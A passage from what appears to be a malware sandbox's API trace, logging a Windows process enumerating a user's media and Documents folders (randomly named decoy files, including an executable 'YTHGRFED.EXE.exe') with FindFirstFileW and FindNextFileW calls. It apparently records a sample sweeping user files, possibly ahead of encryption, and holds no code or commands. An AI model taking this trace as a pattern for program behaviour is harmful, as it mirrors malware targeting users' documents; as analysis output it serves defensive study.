dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gDzXHkl4U_l2Ylj0rT", cAlternateFileName="GDZXHK~1")) returned 1 [0228.773] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf34efcc0, ftCreationTime.dwHighDateTime=0x1d5bb77, ftLastAccessTime.dwLowDateTime=0x1d270910, ftLastAccessTime.dwHighDateTime=0x1d5b728, ftLastWriteTime.dwLowDateTime=0x1d270910, ftLastWriteTime.dwHighDateTime=0x1d5b728, nFileSizeHigh=0x0, nFileSizeLow=0xdaca, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GpxN6i4pZTwUlSXO-f.gif", cAlternateFileName="GPXN6I~1.GIF")) returned 1 [0228.773] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb586e900, ftCreationTime.dwHighDateTime=0x1d5baa7, ftLastAccessTime.dwLowDateTime=0xdd2e3c40, ftLastAccessTime.dwHighDateTime=0x1d5bf63, ftLastWriteTime.dwLowDateTime=0xdd2e3c40, ftLastWriteTime.dwHighDateTime=0x1d5bf63, nFileSizeHigh=0x0, nFileSizeLow=0x2bb2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hDFbsew2.jpg", cAlternateFileName="")) returned 1 [0228.773] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb9e5b40, ftCreationTime.dwHighDateTime=0x1d5be56, ftLastAccessTime.dwLowDateTime=0xbc839960, ftLastAccessTime.dwHighDateTime=0x1d5c1ff, ftLastWriteTime.dwLowDateTime=0xbc839960, ftLastWriteTime.dwHighDateTime=0x1d5c1ff, nFileSizeHigh=0x0, nFileSizeLow=0x14147, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IZMpnRM1tsO.wav", cAlternateFileName="IZMPNR~1.WAV")) returned 1 [0228.773] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef25eb50, ftCreationTime.dwHighDateTime=0x1d5b67b, ftLastAccessTime.dwLowDateTime=0x4278b930, ftLastAccessTime.dwHighDateTime=0x1d5c19a, ftLastWriteTime.dwLowDateTime=0x4278b930, ftLastWriteTime.dwHighDateTime=0x1d5c19a, nFileSizeHigh=0x0, nFileSizeLow=0x124c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="L7tAK3a49Ko.bmp", cAlternateFileName="L7TAK3~1.BMP")) returned 1 [0228.773] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c3b5420, ftCreationTime.dwHighDateTime=0x1d5b776, ftLastAccessTime.dwLowDateTime=0x299f700, ftLastAccessTime.dwHighDateTime=0x1d5bc83, ftLastWriteTime.dwLowDateTime=0x299f700, ftLastWriteTime.dwHighDateTime=0x1d5bc83, nFileSizeHigh=0x0, nFileSizeLow=0xb06, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mQvFbEibR0KeT2 Eo.m4a", cAlternateFileName="MQVFBE~1.M4A")) returned 1 [0228.773] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15c6e840, ftCreationTime.dwHighDateTime=0x1d5b7ad, ftLastAccessTime.dwLowDateTime=0x2c34470, ftLastAccessTime.dwHighDateTime=0x1d5be45, ftLastWriteTime.dwLowDateTime=0x2c34470, ftLastWriteTime.dwHighDateTime=0x1d5be45, nFileSizeHigh=0x0, nFileSizeLow=0x9ad1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="neTGSd9Wavz2PccQ.bmp", cAlternateFileName="NETGSD~1.BMP")) returned 1 [0228.773] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30dbde80, ftCreationTime.dwHighDateTime=0x1d5c075, ftLastAccessTime.dwLowDateTime=0x23831200, ftLastAccessTime.dwHighDateTime=0x1d5b740, ftLastWriteTime.dwLowDateTime=0x23831200, ftLastWriteTime.dwHighDateTime=0x1d5b740, nFileSizeHigh=0x0, nFileSizeLow=0x141a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nPWhBQN.png", cAlternateFileName="")) returned 1 [0228.773] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab4c98a0, ftCreationTime.dwHighDateTime=0x1d5bf6a, ftLastAccessTime.dwLowDateTime=0x540e48a0, ftLastAccessTime.dwHighDateTime=0x1d5be24, ftLastWriteTime.dwLowDateTime=0x540e48a0, ftLastWriteTime.dwHighDateTime=0x1d5be24, nFileSizeHigh=0x0, nFileSizeLow=0x420c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PUalx1NgN7ygE.flv", cAlternateFileName="PUALX1~1.FLV")) returned 1 [0228.773] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54f19720, ftCreationTime.dwHighDateTime=0x1d5c3df, ftLastAccessTime.dwLowDateTime=0x928e28a0, ftLastAccessTime.dwHighDateTime=0x1d5c2ef, ftLastWriteTime.dwLowDateTime=0x928e28a0, ftLastWriteTime.dwHighDateTime=0x1d5c2ef, nFileSizeHigh=0x0, nFileSizeLow=0x1631c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pYabFVF0oorlqx_.wav", cAlternateFileName="PYABFV~1.WAV")) returned 1 [0228.773] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3848c940, ftCreationTime.dwHighDateTime=0x1d5c411, ftLastAccessTime.dwLowDateTime=0x46ecd4e0, ftLastAccessTime.dwHighDateTime=0x1d5bbf7, ftLastWriteTime.dwLowDateTime=0x46ecd4e0, ftLastWriteTime.dwHighDateTime=0x1d5bbf7, nFileSizeHigh=0x0, nFileSizeLow=0x9e5b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rhUiwWu_kT.avi", cAlternateFileName="RHUIWW~1.AVI")) returned 1 [0228.773] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab3bcae0, ftCreationTime.dwHighDateTime=0x1d5c08a, ftLastAccessTime.dwLowDateTime=0x15d7e320, ftLastAccessTime.dwHighDateTime=0x1d5b7f8, ftLastWriteTime.dwLowDateTime=0x15d7e320, ftLastWriteTime.dwHighDateTime=0x1d5b7f8, nFileSizeHigh=0x0, nFileSizeLow=0x8f15, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sz0r8g1H.jpg", cAlternateFileName="")) returned 1 [0228.773] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdbcdd60, ftCreationTime.dwHighDateTime=0x1d5c37e, ftLastAccessTime.dwLowDateTime=0x594c6210, ftLastAccessTime.dwHighDateTime=0x1d5b8e4, ftLastWriteTime.dwLowDateTime=0x594c6210, ftLastWriteTime.dwHighDateTime=0x1d5b8e4, nFileSizeHigh=0x0, nFileSizeLow=0x235f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TAd_29kocAxghHF.png", cAlternateFileName="TAD_29~1.PNG")) returned 1 [0228.773] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3576ea60, ftCreationTime.dwHighDateTime=0x1d5b9e6, ftLastAccessTime.dwLowDateTime=0xbbf91390, ftLastAccessTime.dwHighDateTime=0x1d5bb23, ftLastWriteTime.dwLowDateTime=0xbbf91390, ftLastWriteTime.dwHighDateTime=0x1d5bb23, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UKh5", cAlternateFileName="")) returned 1 [0228.773] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea248200, ftCreationTime.dwHighDateTime=0x1d5be06, ftLastAccessTime.dwLowDateTime=0x230cde50, ftLastAccessTime.dwHighDateTime=0x1d5be98, ftLastWriteTime.dwLowDateTime=0x230cde50, ftLastWriteTime.dwHighDateTime=0x1d5be98, nFileSizeHigh=0x0, nFileSizeLow=0xf349, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VDWoYc.wav", cAlternateFileName="")) returned 1 [0228.773] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6ab3040, ftCreationTime.dwHighDateTime=0x1d5b60a, ftLastAccessTime.dwLowDateTime=0x3f9b8540, ftLastAccessTime.dwHighDateTime=0x1d5c48c, ftLastWriteTime.dwLowDateTime=0x3f9b8540, ftLastWriteTime.dwHighDateTime=0x1d5c48c, nFileSizeHigh=0x0, nFileSizeLow=0x1804c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Wmy-h 74n.mkv", cAlternateFileName="WMY-H7~1.MKV")) returned 1 [0228.773] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f53eb00, ftCreationTime.dwHighDateTime=0x1d5d833, ftLastAccessTime.dwLowDateTime=0x6fec8180, ftLastAccessTime.dwHighDateTime=0x1d5d833, ftLastWriteTime.dwLowDateTime=0x6e22be00, ftLastWriteTime.dwHighDateTime=0x1d5d833, nFileSizeHigh=0x0, nFileSizeLow=0xd9400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YTHGRFED.EXE.exe", cAlternateFileName="YTHGRF~1.EXE")) returned 1 [0228.773] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x987c3720, ftCreationTime.dwHighDateTime=0x1d5c4c0, ftLastAccessTime.dwLowDateTime=0x730f9080, ftLastAccessTime.dwHighDateTime=0x1d5ba44, ftLastWriteTime.dwLowDateTime=0x730f9080, ftLastWriteTime.dwHighDateTime=0x1d5ba44, nFileSizeHigh=0x0, nFileSizeLow=0x129c1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Zyk83hZ.flv", cAlternateFileName="")) returned 1 [0228.773] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1746f7f0, ftCreationTime.dwHighDateTime=0x1d5bf55, ftLastAccessTime.dwLowDateTime=0x6b920870, ftLastAccessTime.dwHighDateTime=0x1d5ba20, ftLastWriteTime.dwLowDateTime=0x6b920870, ftLastWriteTime.dwHighDateTime=0x1d5ba20, nFileSizeHigh=0x0, nFileSizeLow=0x18412, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_0O68mwK4x9FM24.avi", cAlternateFileName="_0O68M~1.AVI")) returned 1 [0228.773] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1746f7f0, ftCreationTime.dwHighDateTime=0x1d5bf55, ftLastAccessTime.dwLowDateTime=0x6b920870, ftLastAccessTime.dwHighDateTime=0x1d5ba20, ftLastWriteTime.dwLowDateTime=0x6b920870, ftLastWriteTime.dwHighDateTime=0x1d5ba20, nFileSizeHigh=0x0, nFileSizeLow=0x18412, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_0O68mwK4x9FM24.avi", cAlternateFileName="_0O68M~1.AVI")) returned 0 [0228.773] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4e30 | out: hHeap=0x620000) returned 1 [0228.774] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.774] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0228.774] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.774] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.774] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.774] PathFindFileNameW (pszPath="") returned="" [0228.774] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa37dd110, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa37dd110, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b900 | out: hHeap=0x620000) returned 1 [0228.774] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa37dd110, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa37dd110, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.774] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c806700, ftCreationTime.dwHighDateTime=0x1d5c3bf, ftLastAccessTime.dwLowDateTime=0x5cdf5520, ftLastAccessTime.dwHighDateTime=0x1d58da8, ftLastWriteTime.dwLowDateTime=0x5cdf5520, ftLastWriteTime.dwHighDateTime=0x1d58da8, nFileSizeHigh=0x0, nFileSizeLow=0x1406c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-_F3s.xlsx", cAlternateFileName="-_F3S~1.XLS")) returned 1 [0228.774] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98fcb6f0, ftCreationTime.dwHighDateTime=0x1d551ef, ftLastAccessTime.dwLowDateTime=0xc57019a0, ftLastAccessTime.dwHighDateTime=0x1d55d2c, ftLastWriteTime.dwLowDateTime=0xc57019a0, ftLastWriteTime.dwHighDateTime=0x1d55d2c, nFileSizeHigh=0x0, nFileSizeLow=0x8066, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0u-c3b.pptx", cAlternateFileName="0U-C3B~1.PPT")) returned 1 [0228.774] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e7f2410, ftCreationTime.dwHighDateTime=0x1d57309, ftLastAccessTime.dwLowDateTime=0x21e56540, ftLastAccessTime.dwHighDateTime=0x1d5b166, ftLastWriteTime.dwLowDateTime=0x21e56540, ftLastWriteTime.dwHighDateTime=0x1d5b166, nFileSizeHigh=0x0, nFileSizeLow=0xcd88, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="539qu3OPBhaEuGH7qKww.pptx", cAlternateFileName="539QU3~1.PPT")) returned 1 [0228.774] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a8dca00, ftCreationTime.dwHighDateTime=0x1d59e56, ftLastAccessTime.dwLowDateTime=0x441eda40, ftLastAccessTime.dwHighDateTime=0x1d56433, ftLastWriteTime.dwLowDateTime=0x441eda40, ftLastWriteTime.dwHighDateTime=0x1d56433, nFileSizeHigh=0x0, nFileSizeLow=0x11951, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B6sDRQG.pptx", cAlternateFileName="B6SDRQ~1.PPT")) returned 1 [0228.774] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cc240c0, ftCreationTime.dwHighDateTime=0x1d5a535, ftLastAccessTime.dwLowDateTime=0x4207a90, ftLastAccessTime.dwHighDateTime=0x1d53ccc, ftLastWriteTime.dwLowDateTime=0x4207a90, ftLastWriteTime.dwHighDateTime=0x1d53ccc, nFileSizeHigh=0x0, nFileSizeLow=0x3ee4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D7SRnQXh-dQO9IFpl.docx", cAlternateFileName="D7SRNQ~1.DOC")) returned 1 [0228.774] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0228.774] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32da4180, ftCreationTime.dwHighDateTime=0x1d5beff, ftLastAccessTime.dwLowDateTime=0xf1b6c910, ftLastAccessTime.dwHighDateTime=0x1d5b5af, ftLastWriteTime.dwLowDateTime=0xf1b6c910, ftLastWriteTime.dwHighDateTime=0x1d5b5af, nFileSizeHigh=0x0, nFileSizeLow=0x67b4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DSk7hWNiE.odt", cAlternateFileName="DSK7HW~1.ODT")) returned 1 [0228.774] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a5ace20, ftCreationTime.dwHighDateTime=0x1d59c1c, ftLastAccessTime.dwLowDateTime=0x4ffe7790, ftLastAccessTime.dwHighDateTime=0x1d5bee6, ftLastWriteTime.dwLowDateTime=0x4ffe7790, ftLastWriteTime.dwHighDateTime=0x1d5bee6, nFileSizeHigh=0x0, nFileSizeLow=0x15e69, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="glQdzW4meiQxrDo.pptx", cAlternateFileName="GLQDZW~1.PPT")) returned 1 [0228.774] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6f856e0, ftCreationTime.dwHighDateTime=0x1d5b8ab, ftLastAccessTime.dwLowDateTime=0xd070610, ftLastAccessTime.dwHighDateTime=0x1d5c156, ftLastWriteTime.dwLowDateTime=0xd070610, ftLastWriteTime.dwHighDateTime=0x1d5c156, nFileSizeHigh=0x0, nFileSizeLow=0xac18, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="H_G Ub15e5ZAiG.pptx", cAlternateFileName="H_GUB1~1.PPT")) returned 1 [0228.774] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9054580, ftCreationTime.dwHighDateTime=0x1d54858, ftLastAccessTime.dwLowDateTime=0x9f170a10, ftLastAccessTime.dwHighDateTime=0x1d5c033, ftLastWriteTime.dwLowDateTime=0x9f170a10, ftLastWriteTime.dwHighDateTime=0x1d5c033, nFileSizeHigh=0x0, nFileSizeLow=0x14010, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Id-3qUuhoEJj.docx", cAlternateFileName="ID-3QU~1.DOC")) returned 1 [0228.774] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3641f4d0, ftCreationTime.dwHighDateTime=0x1d5b770, ftLastAccessTime.dwLowDateTime=0xba821bc0, ftLastAccessTime.dwHighDateTime=0x1d5c149, ftLastWriteTime.dwLowDateTime=0xba821bc0, ftLastWriteTime.dwHighDateTime=0x1d5c149, nFileSizeHigh=0x0, nFileSizeLow=0x11d7f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="j2nriryO.ppt", cAlternateFileName="")) returned 1 [0228.774] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcff48890, ftCreationTime.dwHighDateTime=0x1d5baa4, ftLastAccessTime.dwLowDateTime=0x18912570, ftLastAccessTime.dwHighDateTime=0x1d5bef8, ftLastWriteTime.dwLowDateTime=0x18912570, ftLastWriteTime.dwHighDateTime=0x1d5bef8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ji_heo", cAlternateFileName="")) returned 1 [0228.775] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3086d340, ftCreationTime.dwHighDateTime=0x1d5bf0d, ftLastAccessTime.dwLowDateTime=0x191a07e0, ftLastAccessTime.dwHighDateTime=0x1d59f64, ftLastWriteTime.dwLowDateTime=0x191a07e0, ftLastWriteTime.dwHighDateTime=0x1d59f64, nFileSizeHigh=0x0, nFileSizeLow=0x14f8e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="k5oSr-PB.pptx", cAlternateFileName="K5OSR-~1.PPT")) returned 1 [0228.775] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b777f00, ftCreationTime.dwHighDateTime=0x1d58815, ftLastAccessTime.dwLowDateTime=0x838d2490, ftLastAccessTime.dwHighDateTime=0x1d54762, ftLastWriteTime.dwLowDateTime=0x838d2490, ftLastWriteTime.dwHighDateTime=0x1d54762, nFileSizeHigh=0x0, nFileSizeLow=0xbadd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lF1b2YUr4l3y9B7QFUi.xlsx", cAlternateFileName="LF1B2Y~1.XLS")) returned 1 [0228.775] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0228.775] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0228.775] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0228.775] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0228.775] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74f6a030, ftCreationTime.dwHighDateTime=0x1d54057, ftLastAccessTime.dwLowDateTime=0x53f84ed0, ftLastAccessTime.dwHighDateTime=0x1d5b972, ftLastWriteTime.dwLowDateTime=0x53f84ed0, ftLastWriteTime.dwHighDateTime=0x1d5b972, nFileSizeHigh=0x0, nFileSizeLow=0x13b4e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nhehYsbhj.xlsx", cAlternateFileName="NHEHYS~1.XLS")) returned 1 [0228.775] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0228.775] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64c990, ftCreationTime.dwHighDateTime=0x1d56ffa, ftLastAccessTime.dwLowDateTime=0x73dc1e80, ftLastAccessTime.dwHighDateTime=0x1d56f75, ftLastWriteTime.dwLowDateTime=0x73dc1e80, ftLastWriteTime.dwHighDateTime=0x1d56f75, nFileSizeHigh=0x0, nFileSizeLow=0x29d6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PFoVTxzbqocze_Y6chw.docx", cAlternateFileName="PFOVTX~1.DOC")) returned 1 [0228.775] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe232fe0, ftCreationTime.dwHighDateTime=0x1d55433, ftLastAccessTime.dwLowDateTime=0xb0ce3130, ftLastAccessTime.dwHighDateTime=0x1d578e3, ftLastWriteTime.dwLowDateTime=0xb0ce3130, ftLastWriteTime.dwHighDateTime=0x1d578e3, nFileSizeHigh=0x0, nFileSizeLow=0xd4ca, 